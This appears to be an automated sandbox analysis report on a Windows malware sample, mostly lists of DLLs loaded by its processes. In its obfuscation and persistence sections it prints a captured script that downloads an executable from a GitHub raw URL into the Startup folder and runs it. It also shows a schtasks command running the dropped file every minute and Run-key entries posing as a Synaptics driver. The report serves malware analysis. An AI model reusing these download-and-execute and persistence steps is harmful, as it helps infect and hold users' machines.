                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                                Source: BQQQVU.lnk.15.drLNK file: ..\..\..\..\..\Windata\XNLAGO.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\WOG3KXC.iniJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

                                Data Obfuscation

                                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.Exec("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe")
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00A2C140 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,22_2_00A2C140
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00128D99 push edi; retn 0000h15_2_00128D9B
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00128F0E push F7FFFFFFh; retn 0000h15_2_00128F13
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00147795 push ecx; ret 15_2_001477A8
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00888D99 push edi; retn 0000h22_2_00888D9B
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00888F0E push F7FFFFFFh; retn 0000h22_2_00888F13
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A7795 push ecx; ret 22_2_008A77A8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00128D99 push edi; retn 0000h31_2_00128D9B
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00128F0E push F7FFFFFFh; retn 0000h31_2_00128F13
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00147795 push ecx; ret 31_2_001477A8
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Jump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\RCXD42.tmpJump to dropped file

                                Boot Survival

                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnkJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQQQVUJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_0013F78E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00187F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_00187F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,22_2_0089F78E
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008E7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,22_2_008E7F0E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,31_2_0013F78E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00187F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,31_2_00187F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,22_2_008A1E5A
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: threadDelayed 4655
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: foregroundWindowGot 1498
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 6.4 %
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 3.8 %
